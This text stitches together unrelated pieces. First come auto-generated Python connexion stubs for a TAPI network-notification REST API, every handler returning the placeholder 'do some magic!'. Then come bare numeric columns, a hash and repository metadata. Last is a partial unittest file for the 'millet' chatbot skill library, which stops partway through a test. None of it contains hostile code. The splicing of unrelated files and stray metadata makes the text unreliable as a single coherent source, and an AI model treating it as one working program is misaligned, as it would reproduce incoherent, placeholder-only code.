noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_get returns tapi.notification.SubscriptionFilter # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :rtype: TapiNotificationSubscriptionFilter """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_subscription_filter_name_post(uuid, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_name_post creates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_subscription_filter_namevalue_name_delete(uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_namevalue_name_delete removes tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :rtype: None """ return 'do some magic!' 
def data_context_notification_context_notif_subscriptionuuid_subscription_filter_namevalue_name_get(uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_namevalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_subscription_filter_namevalue_name_post(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_namevalue_name_post creates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_subscription_filter_namevalue_name_put(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_namevalue_name_put creates or updates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_subscription_filter_post(uuid, tapi_notification_subscription_filter=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_post creates tapi.notification.SubscriptionFilter # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_notification_subscription_filter: tapi.notification.SubscriptionFilter to be added to list :type tapi_notification_subscription_filter: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_subscription_filter = TapiNotificationSubscriptionFilter.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_subscription_filter_put(uuid, tapi_notification_subscription_filter=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_put creates or updates tapi.notification.SubscriptionFilter # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_notification_subscription_filter: tapi.notification.SubscriptionFilter to be added or updated :type tapi_notification_subscription_filter: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_subscription_filter = TapiNotificationSubscriptionFilter.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' 
def data_context_notification_context_notificationuuid_additional_infovalue_name_get(uuid, value_name): # noqa: E501 """data_context_notification_context_notificationuuid_additional_infovalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notification :type uuid: str :param value_name: Id of additional-info :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' def data_context_notification_context_notificationuuid_alarm_info_get(uuid): # noqa: E501 """data_context_notification_context_notificationuuid_alarm_info_get returns tapi.notification.AlarmInfo # noqa: E501 :param uuid: Id of notification :type uuid: str :rtype: TapiNotificationAlarmInfo """ return 'do some magic!' def data_context_notification_context_notificationuuid_changed_attributesvalue_name_get(uuid, value_name): # noqa: E501 """data_context_notification_context_notificationuuid_changed_attributesvalue_name_get returns tapi.notification.NameAndValueChange # noqa: E501 :param uuid: Id of notification :type uuid: str :param value_name: Id of changed-attributes :type value_name: str :rtype: TapiNotificationNameAndValueChange """ return 'do some magic!' def data_context_notification_context_notificationuuid_get(uuid): # noqa: E501 """data_context_notification_context_notificationuuid_get returns tapi.notification.Notification # noqa: E501 :param uuid: Id of notification :type uuid: str :rtype: TapiNotificationNotification """ return 'do some magic!' def data_context_notification_context_notificationuuid_namevalue_name_get(uuid, value_name): # noqa: E501 """data_context_notification_context_notificationuuid_namevalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notification :type uuid: str :param value_name: Id of name :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' def data_context_notification_context_notificationuuid_target_object_namevalue_name_get(uuid, value_name): # noqa: E501 """data_context_notification_context_notificationuuid_target_object_namevalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notification :type uuid: str :param value_name: Id of target-object-name :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' def data_context_notification_context_notificationuuid_tca_info_get(uuid): # noqa: E501 """data_context_notification_context_notificationuuid_tca_info_get returns tapi.notification.TcaInfo # noqa: E501 :param uuid: Id of notification :type uuid: str :rtype: TapiNotificationTcaInfo """ return 'do some magic!' def data_context_notification_context_post(tapi_notification_notification_context=None): # noqa: E501 """data_context_notification_context_post creates tapi.notification.NotificationContext # noqa: E501 :param tapi_notification_notification_context: tapi.notification.NotificationContext to be added to list :type tapi_notification_notification_context: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_notification_context = TapiNotificationNotificationContext.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' 
def data_context_notification_context_put(tapi_notification_notification_context=None): # noqa: E501 """data_context_notification_context_put creates or updates tapi.notification.NotificationContext # noqa: E501 :param tapi_notification_notification_context: tapi.notification.NotificationContext to be added or updated :type tapi_notification_notification_context: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_notification_context = TapiNotificationNotificationContext.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def operations_create_notification_subscription_service_post(inline_object2=None): # noqa: E501 """operations_create_notification_subscription_service_post # noqa: E501 :param inline_object2: :type inline_object2: dict | bytes :rtype: TapiNotificationCreateNotificationSubscriptionService """ if connexion.request.is_json: inline_object2 = InlineObject2.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def operations_delete_notification_subscription_service_post(inline_object7=None): # noqa: E501 """operations_delete_notification_subscription_service_post # noqa: E501 :param inline_object7: :type inline_object7: dict | bytes :rtype: TapiNotificationDeleteNotificationSubscriptionService """ if connexion.request.is_json: inline_object7 = InlineObject7.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def operations_get_notification_list_post(inline_object19=None): # noqa: E501 """operations_get_notification_list_post # noqa: E501 :param inline_object19: :type inline_object19: dict | bytes :rtype: TapiNotificationGetNotificationList """ if connexion.request.is_json: inline_object19 = InlineObject19.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def operations_get_notification_subscription_service_details_post(inline_object20=None): # noqa: E501 """operations_get_notification_subscription_service_details_post # noqa: E501 :param inline_object20: :type inline_object20: dict | bytes :rtype: TapiNotificationGetNotificationSubscriptionServiceDetails """ if connexion.request.is_json: inline_object20 = InlineObject20.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def operations_get_notification_subscription_service_list_post(): # noqa: E501 """operations_get_notification_subscription_service_list_post # noqa: E501 :rtype: TapiNotificationGetNotificationSubscriptionServiceList """ return 'do some magic!' def operations_get_supported_notification_types_post(): # noqa: E501 """operations_get_supported_notification_types_post # noqa: E501 :rtype: TapiNotificationGetSupportedNotificationTypes """ return 'do some magic!' def operations_update_notification_subscription_service_post(inline_object28=None): # noqa: E501 """operations_update_notification_subscription_service_post # noqa: E501 :param inline_object28: :type inline_object28: dict | bytes :rtype: TapiNotificationUpdateNotificationSubscriptionService """ if connexion.request.is_json: inline_object28 = InlineObject28.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!'
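All of the handlers above are generated connexion stubs that return 'do some magic!' until implemented. For orientation, a minimal sketch of how such a controller module is typically served — the spec file name 'tapi.yaml' is an assumption, not taken from this repository:

import connexion

app = connexion.App(__name__, specification_dir='.')
app.add_api('tapi.yaml')  # assumed spec file; connexion routes each operationId to a stub above
if __name__ == '__main__':
    app.run(port=8080)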
37.566308
175
0.791814
3,660
31,443
6.436612
0.030328
0.050938
0.089821
0.117158
0.911622
0.901859
0.875287
0.86217
0.833645
0.810977
0
0.018841
0.145883
31,443
836
176
37.611244
0.858356
0.517826
0
0.534091
0
0
0.055448
0
0
0
0
0
0
1
0.301136
false
0
0.136364
0
0.738636
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
7
dddc291d33af2f46594ac1554036c02e0b005588
7,110
py
Python
test/mmag/unit_cell/test_unit_cell.py
SebastiaAgramunt/Micromagnetics
f6888f745cc66f380ee18424196853994311c161
[ "MIT" ]
null
null
null
test/mmag/unit_cell/test_unit_cell.py
SebastiaAgramunt/Micromagnetics
f6888f745cc66f380ee18424196853994311c161
[ "MIT" ]
1
2020-07-28T19:29:31.000Z
2020-09-16T22:06:23.000Z
test/mmag/unit_cell/test_unit_cell.py
SebastiaAgramunt/Micromagnetics
f6888f745cc66f380ee18424196853994311c161
[ "MIT" ]
null
null
null
import unittest

import numpy as np

from mmag.unit_cell.fields import field_dipole
from mmag.unit_cell.cell import Cuboid

_acc = 0.0001

# The following tests compare the magnetic field created by a dipole to the field
# generated by the uniformly charged sheets. Far enough from the cell, the
# resulting fields must be similar.


class TestCubicCell(unittest.TestCase):

    def setUp(self):
        position = np.array([0.0, 0.0, 0.0], dtype=np.float64)
        delta = np.array([1.0, 1.0, 1.0], dtype=np.float64)
        self.init_obj = Cuboid(position, delta)

    def test_magnetic_field_1(self):
        # Testing field uniformly magnetized in Z
        m = np.array([0.0, 0.0, 1.0], dtype=np.float64)
        r = np.array([0.0, 0.0, 3.0], dtype=np.float64)

        dipole_field = field_dipole(self.init_obj.position, m, r)
        box_field = self.init_obj.unit_field(r, m)

        magnitude_dipole = np.sqrt(dipole_field.dot(dipole_field))
        magnitude_box = np.sqrt(box_field.dot(box_field))

        self.assertTrue(np.fabs(magnitude_box - magnitude_dipole) < _acc)
        self.assertTrue(np.fabs(dipole_field[0] - box_field[0]) < _acc)
        self.assertTrue(np.fabs(dipole_field[1] - box_field[1]) < _acc)
        self.assertTrue(np.fabs(dipole_field[2] - box_field[2]) < _acc)

    def test_magnetic_field_2(self):
        # Testing that uniform magnetization in X gives the same field as in Z
        m = np.array([0.0, 0.0, 1.0], dtype=np.float64)
        r = np.array([0.0, 0.0, 3.0], dtype=np.float64)
        box_field_1 = self.init_obj.unit_field(r, m)

        m = np.array([1.0, 0.0, 0.0], dtype=np.float64)
        r = np.array([3.0, 0.0, 0.0], dtype=np.float64)
        box_field_2 = self.init_obj.unit_field(r, m)

        self.assertTrue(np.fabs(box_field_1[2] - box_field_2[0]) < _acc)

    def test_magnetic_field_3(self):
        # Testing at different positions
        m = np.array([0.0, 0.0, 1.0], dtype=np.float64)
        r = np.array([4.0, 1.0, 2.0], dtype=np.float64)

        dipole_field = field_dipole(self.init_obj.position, m, r)
        box_field = self.init_obj.unit_field(r, m)

        magnitude_dipole = np.sqrt(dipole_field.dot(dipole_field))
        magnitude_box = np.sqrt(box_field.dot(box_field))

        self.assertTrue(np.fabs(magnitude_box - magnitude_dipole) < _acc)
        self.assertTrue(np.fabs(dipole_field[0] - box_field[0]) < _acc)
        self.assertTrue(np.fabs(dipole_field[1] - box_field[1]) < _acc)
        self.assertTrue(np.fabs(dipole_field[2] - box_field[2]) < _acc)

    def test_magnetic_field_4(self):
        m = np.array([0.0, 0.0, 1.0], dtype=np.float64)
        r = np.array([1.0, 3.0, 2.0], dtype=np.float64)

        dipole_field = field_dipole(self.init_obj.position, m, r)
        box_field = self.init_obj.unit_field(r, m)

        magnitude_dipole = np.sqrt(dipole_field.dot(dipole_field))
        magnitude_box = np.sqrt(box_field.dot(box_field))

        self.assertTrue(np.fabs(magnitude_box - magnitude_dipole) < _acc)
        self.assertTrue(np.fabs(dipole_field[0] - box_field[0]) < _acc)
        self.assertTrue(np.fabs(dipole_field[1] - box_field[1]) < _acc)
        self.assertTrue(np.fabs(dipole_field[2] - box_field[2]) < _acc)


class TestCubicCellDifferentDirections(unittest.TestCase):

    def setUp(self):
        position = np.array([0.0, 0.0, 0.0], dtype=np.float64)
        delta = np.array([1.0, 1.0, 1.0], dtype=np.float64)
        self.init_obj = Cuboid(position, delta)

    def test_magnetic_field_1(self):
        # Testing field uniformly magnetized along the (1, 1, 1) diagonal
        m = np.array(
            [1.0 / np.sqrt(3.0), 1.0 / np.sqrt(3.0), 1.0 / np.sqrt(3.0)],
            dtype=np.float64,
        )
        r = np.array([0.0, 0.0, 3.0], dtype=np.float64)

        dipole_field = field_dipole(self.init_obj.position, m, r)
        box_field = self.init_obj.unit_field(r, m)

        magnitude_dipole = np.sqrt(dipole_field.dot(dipole_field))
        magnitude_box = np.sqrt(box_field.dot(box_field))

        self.assertTrue(np.fabs(magnitude_box - magnitude_dipole) < _acc)
        self.assertTrue(np.fabs(dipole_field[0] - box_field[0]) < _acc)
        self.assertTrue(np.fabs(dipole_field[1] - box_field[1]) < _acc)
        self.assertTrue(np.fabs(dipole_field[2] - box_field[2]) < _acc)

    def test_magnetic_field_2(self):
        # Same diagonal magnetization, observation point off-axis
        m = np.array(
            [1.0 / np.sqrt(3.0), 1.0 / np.sqrt(3.0), 1.0 / np.sqrt(3.0)],
            dtype=np.float64,
        )
        r = np.array([1.0, 0.0, 2.0], dtype=np.float64)

        dipole_field = field_dipole(self.init_obj.position, m, r)
        box_field = self.init_obj.unit_field(r, m)

        magnitude_dipole = np.sqrt(dipole_field.dot(dipole_field))
        magnitude_box = np.sqrt(box_field.dot(box_field))

        self.assertTrue(np.fabs(magnitude_box - magnitude_dipole) < _acc)
        self.assertTrue(np.fabs(dipole_field[0] - box_field[0]) < _acc)
        self.assertTrue(np.fabs(dipole_field[1] - box_field[1]) < _acc)
        self.assertTrue(np.fabs(dipole_field[2] - box_field[2]) < _acc)

    def test_magnetic_field_3(self):
        # Same diagonal magnetization, observation point further off-axis
        m = np.array(
            [1.0 / np.sqrt(3.0), 1.0 / np.sqrt(3.0), 1.0 / np.sqrt(3.0)],
            dtype=np.float64,
        )
        r = np.array([1.0, 5.0, 2.0], dtype=np.float64)

        dipole_field = field_dipole(self.init_obj.position, m, r)
        box_field = self.init_obj.unit_field(r, m)

        magnitude_dipole = np.sqrt(dipole_field.dot(dipole_field))
        magnitude_box = np.sqrt(box_field.dot(box_field))

        self.assertTrue(np.fabs(magnitude_box - magnitude_dipole) < _acc)
        self.assertTrue(np.fabs(dipole_field[0] - box_field[0]) < _acc)
        self.assertTrue(np.fabs(dipole_field[1] - box_field[1]) < _acc)
        self.assertTrue(np.fabs(dipole_field[2] - box_field[2]) < _acc)


class TestCubicCellNotOrigin(unittest.TestCase):

    def setUp(self):
        position = np.array([1.0, 2.0, 3.0], dtype=np.float64)
        delta = np.array([1.0, 1.0, 1.0], dtype=np.float64)
        self.init_obj = Cuboid(position, delta)

    def test_magnetic_field_1(self):
        # Testing a cell positioned away from the origin
        m = np.array(
            [1.0 / np.sqrt(3.0), 1.0 / np.sqrt(3.0), 1.0 / np.sqrt(3.0)],
            dtype=np.float64,
        )
        r = np.array([7.0, 8.0, 7.0], dtype=np.float64)

        dipole_field = field_dipole(self.init_obj.position, m, r)
        box_field = self.init_obj.unit_field(r, m)

        magnitude_dipole = np.sqrt(dipole_field.dot(dipole_field))
        magnitude_box = np.sqrt(box_field.dot(box_field))

        print(magnitude_box, magnitude_dipole)
        print(box_field, dipole_field)

        self.assertTrue(np.fabs(magnitude_box - magnitude_dipole) < _acc)
        self.assertTrue(np.fabs(dipole_field[0] - box_field[0]) < _acc)
        self.assertTrue(np.fabs(dipole_field[1] - box_field[1]) < _acc)
        self.assertTrue(np.fabs(dipole_field[2] - box_field[2]) < _acc)


if __name__ == "__main__":
    unittest.main()
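For reference, the point-dipole field these tests compare against has the standard closed form; a minimal sketch of what field_dipole plausibly computes, in reduced units with the mu_0/(4*pi) prefactor dropped (an assumption — the real implementation lives in mmag.unit_cell.fields):

import numpy as np

def dipole_field_sketch(p, m, r):
    # B(r) ~ (3*rhat*(m . rhat) - m) / |r - p|**3, the point-dipole far field
    d = r - p
    dist = np.sqrt(d.dot(d))
    rhat = d / dist
    return (3.0 * rhat * m.dot(rhat) - m) / dist**3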
40.169492
104
0.637553
1,122
7,110
3.840463
0.073084
0.087259
0.02019
0.134602
0.882107
0.881875
0.875609
0.859364
0.829659
0.829195
0
0.049955
0.220113
7,110
176
105
40.397727
0.727142
0.066104
0
0.768595
0
0
0.001207
0
0
0
0
0
0.239669
1
0.090909
false
0
0.033058
0
0.14876
0.016529
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
fb236a350ef9556936198d2879581f2c55ea1815
349
py
Python
tests/internal/instance_type/test_instance_type_g3_auto.py
frolovv/aws.ec2.compare
582805823492f833d65c0441c4a14dce697c12aa
[ "Apache-2.0" ]
null
null
null
tests/internal/instance_type/test_instance_type_g3_auto.py
frolovv/aws.ec2.compare
582805823492f833d65c0441c4a14dce697c12aa
[ "Apache-2.0" ]
null
null
null
tests/internal/instance_type/test_instance_type_g3_auto.py
frolovv/aws.ec2.compare
582805823492f833d65c0441c4a14dce697c12aa
[ "Apache-2.0" ]
1
2021-12-15T11:58:22.000Z
2021-12-15T11:58:22.000Z
# Testing module instance_type.g3
import pytest

import ec2_compare.internal.instance_type.g3


def test_get_internal_data_instance_type_g3_get_instances_list():
    assert len(ec2_compare.internal.instance_type.g3.get_instances_list()) > 0


def test_get_internal_data_instance_type_g3_get():
    assert len(ec2_compare.internal.instance_type.g3.get) > 0
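The two checks above are pure smoke tests, runnable with `pytest tests/internal/instance_type/test_instance_type_g3_auto.py`. A hypothetical sketch of the same check parametrized over several families — the family names beyond g3 and the shared get_instances_list() helper are assumptions:

import importlib

import pytest


@pytest.mark.parametrize("family", ["g3", "g4dn"])  # illustrative family names
def test_family_has_instances(family):
    mod = importlib.import_module(f"ec2_compare.internal.instance_type.{family}")
    assert len(mod.get_instances_list()) > 0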
34.9
76
0.848138
56
349
4.839286
0.339286
0.265683
0.309963
0.250923
0.826568
0.826568
0.612546
0.612546
0.612546
0
0
0.034056
0.074499
349
9
77
38.777778
0.804954
0.088825
0
0
0
0
0
0
0
0
0
0
0.333333
1
0.333333
true
0
0.333333
0
0.666667
0
0
0
0
null
1
1
1
1
1
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
0
0
0
9
34abc0d217e6d2fe1de4fb7babb056c00eaece5f
135
py
Python
riptide_proxy/resources.py
theCapypara/riptide-proxy
1601e5be75acf9f858bd9e06f67cc0b27f4eae61
[ "MIT" ]
2
2019-05-23T10:09:18.000Z
2020-06-22T11:15:30.000Z
riptide_proxy/resources.py
Parakoopa/riptide-proxy
7e684a716f1df655109135e8f83ac43b2936f2b2
[ "MIT" ]
5
2020-02-14T07:32:05.000Z
2020-06-22T11:13:35.000Z
riptide_proxy/resources.py
theCapypara/riptide-proxy
1601e5be75acf9f858bd9e06f67cc0b27f4eae61
[ "MIT" ]
null
null
null
"""template file management""" import pkg_resources def get_resources(): return pkg_resources.resource_filename(__name__, 'tpl')
19.285714
59
0.77037
16
135
6
0.8125
0.25
0
0
0
0
0
0
0
0
0
0
0.118519
135
6
60
22.5
0.806723
0.177778
0
0
0
0
0.028571
0
0
0
0
0
0
1
0.333333
true
0
0.333333
0.333333
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
1
1
0
0
8
34b1dd2156847b8e707716a768c9d587fa73286f
105
py
Python
syft/he/keys.py
aradhyamathur/PySyft
03f73d31b869596978fb779596075ce806afef34
[ "Apache-2.0" ]
1
2017-09-22T13:11:01.000Z
2017-09-22T13:11:01.000Z
syft/he/keys.py
aradhyamathur/PySyft
03f73d31b869596978fb779596075ce806afef34
[ "Apache-2.0" ]
null
null
null
syft/he/keys.py
aradhyamathur/PySyft
03f73d31b869596978fb779596075ce806afef34
[ "Apache-2.0" ]
1
2020-05-27T10:20:40.000Z
2020-05-27T10:20:40.000Z
import syft


def Paillier(n_length=1024):
    return syft.he.paillier.keys.KeyPair().generate(n_length)
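A hedged usage sketch; that generate() hands back a (public, private) pair is an assumption based only on the KeyPair name, not verified against this PySyft revision:

# pub, pri = Paillier(n_length=1024)  # assumed return shape: (public key, private key)
# cipher = pub.encrypt(5)             # hypothetical call, for orientation only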
17.5
61
0.761905
16
105
4.875
0.75
0.179487
0
0
0
0
0
0
0
0
0
0.043011
0.114286
105
5
62
21
0.795699
0
0
0
1
0
0
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
7
34b84670a3509130ae9c7eefbb6fcd2800a576d1
129
py
Python
tools/scitools/conf/understand/python/python3/future_builtins.py
brucegua/moocos
575c161cfa35e220f10d042e2e5ca18773691695
[ "Apache-2.0" ]
1
2020-01-20T21:26:46.000Z
2020-01-20T21:26:46.000Z
tools/scitools/conf/understand/python/python3/future_builtins.py
brucegua/moocos
575c161cfa35e220f10d042e2e5ca18773691695
[ "Apache-2.0" ]
null
null
null
tools/scitools/conf/understand/python/python3/future_builtins.py
brucegua/moocos
575c161cfa35e220f10d042e2e5ca18773691695
[ "Apache-2.0" ]
null
null
null
def ascii(arg):
    pass


def filter(pred, iterable):
    pass


def hex(arg):
    pass


def map(func, *iterables):
    pass


def oct(arg):
    pass
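These empty bodies are signature-only stubs for the Understand static analyzer. The real future_builtins module (Python 2.6/2.7 standard library) exposed Python-3-style versions of these builtins, used like:

# Python 2 usage of the module these stubs model:
# from future_builtins import map, filter, hex, oct, ascii
# squares = map(lambda x: x * x, range(5))  # an iterator, as in Python 3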
21.5
33
0.689922
22
129
4.045455
0.545455
0.314607
0.224719
0
0
0
0
0
0
0
0
0
0.170543
129
5
34
25.8
0.831776
0
0
0
0
0
0
0
0
0
0
0
0
1
1
false
1
0
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
1
0
0
7
550de1a3a3d84eeeead3aeac2a119d3580fe892c
198
py
Python
skshape/image/segmentation/__init__.py
scikit-shape/scikit-shape
eca3f7f1cf39ef4ce89f17423b3e4ba1aed7eb45
[ "BSD-3-Clause" ]
5
2020-11-13T11:59:42.000Z
2022-02-09T11:45:10.000Z
skshape/image/segmentation/__init__.py
scikit-shape/scikit-shape
eca3f7f1cf39ef4ce89f17423b3e4ba1aed7eb45
[ "BSD-3-Clause" ]
1
2021-02-18T12:05:15.000Z
2021-02-18T12:05:15.000Z
skshape/image/segmentation/__init__.py
scikit-shape/scikit-shape
eca3f7f1cf39ef4ce89f17423b3e4ba1aed7eb45
[ "BSD-3-Clause" ]
1
2022-02-09T11:45:17.000Z
2022-02-09T11:45:17.000Z
from ._segment import segment_by_topology, segment_boundaries, segment_phase_field

__all__ = ['segment_by_topology', 'segment_boundaries', 'segment_phase_field']
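With the re-exports and the matching __all__, callers import straight from the subpackage:

# e.g.
# from skshape.image.segmentation import segment_by_topology, segment_phase_field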
24.75
82
0.691919
20
198
6.1
0.45
0.147541
0.278689
0.393443
0.836066
0.836066
0.836066
0.836066
0
0
0
0
0.237374
198
7
83
28.285714
0.807947
0
0
0
0
0
0.282828
0
0
0
0
0
0
1
0
false
0
0.2
0
0.2
0
1
0
0
null
0
1
1
1
1
1
1
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
9b92689d9da5cad2c180264bfbfeaf08a772dad4
10,705
py
Python
tests/test_skill.py
odryfox/millet
8800152562f4bd2ac638978865f9a9c862060733
[ "BSD-3-Clause" ]
3
2020-02-01T17:33:22.000Z
2021-08-04T17:02:08.000Z
tests/test_skill.py
odryfox/millet
8800152562f4bd2ac638978865f9a9c862060733
[ "BSD-3-Clause" ]
1
2021-03-19T22:25:04.000Z
2021-10-07T06:53:24.000Z
tests/test_skill.py
odryfox/millet
8800152562f4bd2ac638978865f9a9c862060733
[ "BSD-3-Clause" ]
null
null
null
from millet import BaseSkill


class TestSkill:

    def test_say(self):
        class EchoSkill(BaseSkill):
            def execute(self, message: str, user_id: str):
                self.say(message)

        skill = EchoSkill()

        result = skill.run(
            message='hello', user_id='100500', history=[], state_name=None, context={}
        )
        assert result.answers == ['hello']
        assert result.is_relevant
        assert result.is_finished
        assert result.direct_to is None
        assert result.context == {}

        result = skill.run(
            message='bye', user_id='100500', history=[], state_name=None, context=result.context
        )
        assert result.answers == ['bye']
        assert result.is_relevant
        assert result.is_finished
        assert result.direct_to is None
        assert result.context == {}

    def test_say_return(self):
        class EchoSkill(BaseSkill):
            def execute(self, message: str, user_id: str):
                return message

        skill = EchoSkill()

        result = skill.run(
            message='hello', user_id='100500', history=[], state_name=None, context={}
        )
        assert result.answers == ['hello']
        assert result.is_relevant
        assert result.is_finished
        assert result.direct_to is None
        assert result.context == {}

    def test_double_say(self):
        class DoubleEchoSkill(BaseSkill):
            def execute(self, message: str, user_id: str):
                self.say(message)
                self.say(message)

        skill = DoubleEchoSkill()

        result = skill.run(
            message='hello', user_id='100500', history=[], state_name=None, context={}
        )
        assert result.answers == ['hello', 'hello']
        assert result.is_relevant
        assert result.is_finished
        assert result.direct_to is None
        assert result.context == {}

        result = skill.run(
            message='bye', user_id='100500', history=[], state_name=None, context=result.context
        )
        assert result.answers == ['bye', 'bye']
        assert result.is_relevant
        assert result.is_finished
        assert result.direct_to is None
        assert result.context == {}

    def test_ask(self):
        class MeetingSkill(BaseSkill):
            def execute(self, message: str, user_id: str):
                name = self.ask('What is your name?')
                self.say(f'Nice to meet you {name}!')

        skill = MeetingSkill()

        result = skill.run(
            message='hello', user_id='100500', history=[], state_name=None, context={}
        )
        assert result.answers == ['What is your name?']
        assert result.is_relevant
        assert not result.is_finished
        assert result.direct_to is None
        assert result.context == {}

        result = skill.run(
            message='Bob', user_id='100500', history=['hello'], state_name=None, context=result.context
        )
        assert result.answers == ['Nice to meet you Bob!']
        assert result.is_relevant
        assert result.is_finished
        assert result.direct_to is None
        assert result.context == {}

    def test_ask_with_direct_to(self):
        class MeetingSkillWithStates(BaseSkill):
            def execute(self, message: str, user_id: str):
                self.ask('What is your name?', direct_to='meeting')

            def meeting(self, name: str, user_id: str):
                self.say(f'Nice to meet you {name}!')

        skill = MeetingSkillWithStates()

        result = skill.run(
            message='hello', user_id='100500', history=[], state_name=None, context={}
        )
        assert result.answers == ['What is your name?']
        assert result.is_relevant
        assert not result.is_finished
        assert result.direct_to == 'meeting'
        assert result.context == {}

        result = skill.run(
            message='Bob', user_id='100500', history=[], state_name='meeting', context=result.context
        )
        assert result.answers == ['Nice to meet you Bob!']
        assert result.is_relevant
        assert result.is_finished
        assert result.direct_to is None
        assert result.context == {}

    def test_ask_with_direct_to_callable(self):
        class MeetingSkillWithStates(BaseSkill):
            def execute(self, message: str, user_id: str):
                self.ask('What is your name?', direct_to=self.meeting)

            def meeting(self, name: str, user_id: str):
                self.say(f'Nice to meet you {name}!')

        skill = MeetingSkillWithStates()

        result = skill.run(
            message='hello', user_id='100500', history=[], state_name=None, context={}
        )
        assert result.answers == ['What is your name?']
        assert result.is_relevant
        assert not result.is_finished
        assert result.direct_to == 'meeting'
        assert result.context == {}

        result = skill.run(
            message='Bob', user_id='100500', history=[], state_name='meeting', context=result.context
        )
        assert result.answers == ['Nice to meet you Bob!']
        assert result.is_relevant
        assert result.is_finished
        assert result.direct_to is None
        assert result.context == {}

    def test_specify(self):
        class AgeSkill(BaseSkill):
            def execute(self, message: str, user_id: str):
                try:
                    age = int(message)
                except ValueError:
                    age = self.specify(question='Are you sure?')
                self.say(f'You are {age} years old')

        skill = AgeSkill()

        result = skill.run(
            message='twenty four', user_id='100500', history=[], state_name=None, context={}
        )
        assert result.answers == ['Are you sure?']
        assert not result.is_relevant
        assert not result.is_finished
        assert result.direct_to is None
        assert result.context == {}

        result = skill.run(
            message='24', user_id='100500', history=['twenty four'], state_name=None,
            context=result.context,
        )
        assert result.answers == ['You are 24 years old']
        assert result.is_relevant
        assert result.is_finished
        assert result.direct_to is None
        assert result.context == {}

    def test_specify_with_direct_to(self):
        class AgeSkillWithDirectTo(BaseSkill):
            def execute(self, message: str, user_id: str):
                try:
                    age = int(message)
                except ValueError:
                    self.specify(question='Are you sure?', direct_to='execute')
                self.say(f'You are {age} years old')

        skill = AgeSkillWithDirectTo()

